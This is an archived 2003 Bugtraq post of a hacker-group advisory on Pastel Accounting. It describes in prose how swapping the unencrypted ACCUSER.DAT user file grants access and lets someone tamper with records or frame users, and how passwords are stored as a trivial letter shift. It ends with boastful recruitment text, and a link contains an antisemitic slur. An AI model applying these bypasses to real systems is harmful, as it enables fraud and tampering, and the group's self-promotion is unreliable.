Home page logo

bugtraq logo Bugtraq mailing list archives

[blaqhatz] - Pastel Accounting application security issues
From: "l33t guy" <blaqhatz () webmail co za>
Date: Mon, 3 Mar 2003 17:43:11 +0200

See attached.
 http://www.webmail.co.za the South-African free email service

  NetWiseGurus.Com Portal - Your Own Internet Business Today!

Hash: SH1T


blaqhatz! () #!@%! () #! ADVISORY blaqhatz! () #!@%! () #!

blaqhatz advisory #1
date: third day of march, in the year of our lord
 two thousand and three (03/03/03)
why today? coz we love 303, oh! oh! oh! http://www.only4jewz.net/efil4zaggin/blaqhatz.advisory.20030303

l                                                                          l
a      ,-.        ||||||  ||     //\\   /|||\  ||  ||  //\\ |||||| |||||/  a
q     /`-'\       ||   )) ||    //  \\ ||   || ||  || //  \\  ||      //   q
|  .-/     \-,    ||||<<  ||    /||||\ ||   || |||||| /||||\  ||     //    |
b (  `.___.'  )   ||   )) ||    ||  || ||   || ||  || ||  ||  ||    //     b
l  `. _____ .'    ||||||  ||||| ||  ||  \|||\\ ||  || ||  ||  ||   /|||||  l
a                                            \\                            a 

PRODUCT: PASTEL ACCOUNTING v6.0-6.12 (confirmed)
         earlier versions (suspected)


Pastel Accounting is an accounting package widely used by small business entities in countries in Africa, Europe, the 
Middle and Far East and Australasia. The Pastel product includes a facility for secure access to specific modules 
within the product.

Further information is available @ http://www.pastel.com


The security system and application controls used by the Pastel product are broken.

All user and security information is stored with the file "ACCUSER.DAT" within the chosen client folder. No data is 
encrypted with any information within this file, nor is any version/validity checking done against this file.

As such, it is possible to replace the ACCUSER.DAT file with one from a different set of accounts, with known usernames 
and passwords, access and modify the data stored within a specific set of accounts and then restore the original file, 
thus providing no concrete on by whom the files were modified.

In some contexts, it would even be possible to falsify records in an attempt to 'frame' a particular user with changes.

Additionally, some preliminary testing on the accuser.dat file displayed an alarming correlation between certain 
sections of the file and the passwords chosen. For example, given a group of users with chosen passwords "AAAAAAAA", 
"BBBBBBBB", "CCCCCCCC", "DDDDDDDD", and "ABCDEFGH", the following strings were found in the file: "ssssssss", 
"tttttttt", "uuuuuuuu", "vvvvvvvv", and "stuvwxyz".


Users may not rely on the application level controls implemented by the Pastel Accounting package.

As no reliance may be placed on applicaton level controls, auditors must audit around the application.

4. FIX

None as of yet. Vendor notified.

blaqhatz are:

                pheer - pheerless
 - skankyvontrashbag - skankette - nyama_zinto -
 rod-boi - pheered - minibyte - whoot - pofmuis


           !!# () j01N blaqhatz t0D4y!! () #

 mailto:eye.am.leet.eye.swear () blaqhatz za net

telling us who and what you are and with a good reason as to why you think you're leet enough to join blaqhatz

              Why should I join?

1. Everyone else thinks blaqhatz 0wn.
2. blaqhatz have been interviewed by more international legal authorities, seen the inside of more networks and more 
telco's, been on more television shows, been asked to assist more national intelligence agencies and skewled more 
people than any other group. **blaqhatz are *the* authority on modern information security** 3. We're nice people. 4. 
You can get  sekret, blaqhatz warez, for free, just for applying. 5. You value security and 0day. You believe in 
freedom of information. You believe in helping others help themselves. blaqhatz will help you act to make your beliefs 
a reality. 6. We're only accepting new member applications until the 9th of the 3rd, 2000 & 3, on a first come, first 
served basis. All members will need to be approved by the elite blaqhatz board.

Big ups, shout outs and serious ruspek go to:
~el8, BoW, #havok, phrack.org, kouriers 4 christ, #hack krew, oldskewl efnet #phreakGER, effkay, arclight, maelstrom, 
ganja_man, scavenger, mindbinder, raw liquid, tonedef, y0y0y0 and c0.

r0qin' 1t iN 2w0-d0ubl3-0h-thr33!!! () #

Version: PPP 3.0.3 d34dc0d35f4dd34dc0d35f4dd34dc0d35f4dd34dc0d35f4d
-----END PPP SIGNATURE----- _______________________________________________________________

  By Date           By Thread  

Current thread:
  • [blaqhatz] - Pastel Accounting application security issues l33t guy (Mar 03)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]